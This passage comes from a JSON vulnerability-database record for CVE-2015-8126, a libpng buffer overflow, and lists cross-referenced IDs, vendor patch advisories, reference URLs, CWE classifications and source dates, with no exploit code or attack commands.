"reference": "https://www.scap.org.cn/vuln/vhn-86087",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2015-8126",
"trust": 2.9
},
{
"db": "BID",
"id": "77568",
"trust": 2.1
},
{
"db": "SECTRACK",
"id": "1034142",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2015/11/12/2",
"trust": 1.8
},
{
"db": "MCAFEE",
"id": "SB10148",
"trust": 1.8
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "136095",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "135338",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134720",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-89794",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-86087",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-8126",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135558",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135557",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135339",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137932",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135341",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134619",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134436",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
},
{
"db": "VULMON",
"id": "CVE-2015-8126"
},
{
"db": "BID",
"id": "77568"
},
{
"db": "PACKETSTORM",
"id": "135558"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135339"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "135341"
},
{
"db": "PACKETSTORM",
"id": "134619"
},
{
"db": "PACKETSTORM",
"id": "136095"
},
{
"db": "PACKETSTORM",
"id": "134436"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
},
{
"db": "NVD",
"id": "CVE-2015-8126"
}
]
},
"id": "VAR-201511-0126",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T23:18:25.753000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libpng Buffer Overflow Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=58735"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/01/20/oracle_q1_2016_patch_release/"
},
{
"title": "Red Hat: Moderate: libpng12 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152595 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152596 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libpng security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20152594 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2015-8126: buffer overflow",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=48ea0ad3686f0e21036476817f732c90"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: CVE-2015-7981: out-of-bound read",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=83b375e2e219a2891fcbdacbafaee367"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2815-1"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: Incomplete fix for CVE-2015-8126",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=386e683fecec564e81371b5dca873869"
},
{
"title": "Debian Security Advisories: DSA-3399-1 libpng -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=6c419f27840ce87aab71c3d89dad3813"
},
{
"title": "Amazon Linux AMI: ALAS-2015-611",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2015-611"
},
{
"title": "Red Hat: CVE-2015-8126",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2015-8126"
},
{
"title": "Debian Security Advisories: DSA-3443-1 libpng -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=57e4bc5fc071e2986f7cef65414ffe23"
},
{
"title": "Apple: OS X El Capitan v10.11.4 and Security Update 2016-002",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ef054ba76412200e34091eb91c38c281"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics for NPS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36fc403a4c2c6439b732d2fca738f58"
},
{
"title": "cheque",
"trust": 0.1,
"url": "https://github.com/sonatype-nexus-community/cheque "
},
{
"title": "clair-lab",
"trust": 0.1,
"url": "https://github.com/sjourdan/clair-lab "
},
{
"title": "afl-cve",
"trust": 0.1,
"url": "https://github.com/mrash/afl-cve "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-8126"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-120",
"trust": 1.1
},
{
"problemtype": "CWE-119",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
},
{
"db": "NVD",
"id": "CVE-2015-8126"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
},
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/77568"
},
{
"trust": 1.9,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0055.html"
},
{
"trust": 1.9,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0056.html"
},
{
"trust": 1.9,
"url": "https://access.redhat.com/errata/rhsa-2016:1430"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
},
{
"trust": 1.8,
"url": "http://googlechromereleases.blogspot.com/2016/03/stable-channel-update.html"
},
{
"trust": 1.8,
"url": "https://code.google.com/p/chromium/issues/detail?id=560291"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht206167"
},
{
"trust": 1.8,
"url": "http://www.debian.org/security/2015/dsa-3399"
},
{
"trust": 1.8,
"url": "http://www.debian.org/security/2016/dsa-3507"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172769.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172620.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174936.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175073.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172663.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172324.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172823.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172797.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/174905.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172647.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/177382.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/177344.html"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/201603-09"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/201611-08"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2015/11/12/2"
},
{
"trust": 1.8,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2594.html"
},
{
"trust": 1.8,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2595.html"
},
{
"trust": 1.8,
"url": "http://rhn.redhat.com/errata/rhsa-2015-2596.html"
},
{
"trust": 1.8,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0057.html"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1034142"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00038.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00042.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00044.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00015.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00033.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00034.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2015-11/msg00159.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2015-11/msg00160.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00062.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00063.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00028.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00029.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00030.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00041.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00043.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00045.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00047.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00048.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00014.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00018.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00028.html"
},
{
"trust": 1.8,
"url": "http://www.ubuntu.com/usn/usn-2815-1"
},
{
"trust": 1.7,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10148"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2015-8126"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-affect-ibm-netezza-analytics-for-nps/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-jre-8-0-1-1-affect-ibm-netezza-platform-software-clients/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-0448"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7575"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2015-7575"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-0483"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-0402"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7981"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-0466"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2015-8472"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-0494"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0448"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0466"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0483"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0494"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0402"
},
{
"trust": 0.3,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.3,
"url": "http://aix.software.ibm.com/aix/efixes/security/java_jan2016_advisory.asc"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023374"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023984"
},
{
"trust": 0.3,
"url": "http://seclists.org/oss-sec/2015/q4/261"
},
{
"trust": 0.3,
"url": " https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099293"
},
{
"trust": 0.3,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099371"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982337"
},
{
"trust": 0.3,
"url": "http://www.ibm.com/support/docview.wss?uid=swg21979528"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978310"
},
{
"trust": 0.3,
"url": "http://www.ibm.com/support/docview.wss?uid=swg21979761"
},
{
"trust": 0.3,
"url": "http://googlechromereleases.blogspot.in/2016/03/stable-channel-update.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21973231"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21974194"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975785"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975835"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975904"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975929"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975930"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976631"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976855"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976924"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977053"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983487"
},
{
"trust": 0.3,
"url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000115"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5041"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-8540"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-7981"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8540"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-5041"
},
{
"trust": 0.2,
"url": "https://www.ibm.com/developerworks/java/jdk/alerts/"
},
{
"trust": 0.2,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#appendixjava"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10148"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2015:2595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/sonatype-nexus-community/cheque"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=43864"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/2815-1/"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0101.html"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2016-0099.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0475"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0475"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4883"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4882"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4872"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4844"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3449"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0264"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4860"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4871"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0376"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0376"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4860"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4883"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4882"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4872"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0686"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-4806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5006"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5006"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0687"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0264"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8126."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7981"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1636"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1633"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1634"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1639"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1630"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1638"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1640"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1642"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1635"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1631"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1637"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
},
{
"db": "VULMON",
"id": "CVE-2015-8126"
},
{
"db": "BID",
"id": "77568"
},
{
"db": "PACKETSTORM",
"id": "135558"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135339"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "135341"
},
{
"db": "PACKETSTORM",
"id": "134619"
},
{
"db": "PACKETSTORM",
"id": "136095"
},
{
"db": "PACKETSTORM",
"id": "134436"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
},
{
"db": "NVD",
"id": "CVE-2015-8126"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-86087",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2015-8126",
"ident": null
},
{
"db": "BID",
"id": "77568",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135558",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135557",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135339",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "137932",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "135341",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134619",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "136095",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "134436",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2015-8126",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2015-11-13T00:00:00",
"db": "VULHUB",
"id": "VHN-86087",
"ident": null
},
{
"date": "2015-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2015-8126",
"ident": null
},
{
"date": "2015-11-12T00:00:00",
"db": "BID",
"id": "77568",
"ident": null
},
{
"date": "2016-02-02T16:44:18",
"db": "PACKETSTORM",
"id": "135558",
"ident": null
},
{
"date": "2016-02-02T16:44:12",
"db": "PACKETSTORM",
"id": "135557",
"ident": null
},
{
"date": "2016-01-21T14:47:36",
"db": "PACKETSTORM",
"id": "135339",
"ident": null
},
{
"date": "2016-07-18T19:51:43",
"db": "PACKETSTORM",
"id": "137932",
"ident": null
},
{
"date": "2016-01-21T14:47:53",
"db": "PACKETSTORM",
"id": "135341",
"ident": null
},
{
"date": "2015-12-03T14:47:41",
"db": "PACKETSTORM",
"id": "134619",
"ident": null
},
{
"date": "2016-03-07T15:09:16",
"db": "PACKETSTORM",
"id": "136095",
"ident": null
},
{
"date": "2015-11-19T14:13:58",
"db": "PACKETSTORM",
"id": "134436",
"ident": null
},
{
"date": "2015-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-246",
"ident": null
},
{
"date": "2015-11-13T03:59:05.917000",
"db": "NVD",
"id": "CVE-2015-8126",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2020-08-31T00:00:00",
"db": "VULHUB",
"id": "VHN-86087",
"ident": null
},
{
"date": "2020-09-08T00:00:00",
"db": "VULMON",
"id": "CVE-2015-8126",
"ident": null
},
{
"date": "2016-08-02T17:01:00",
"db": "BID",
"id": "77568",
"ident": null
},
{
"date": "2022-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-246",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-8126",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libpng Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
}
],
"trust": 0.6
}
}
VAR-201003-1082
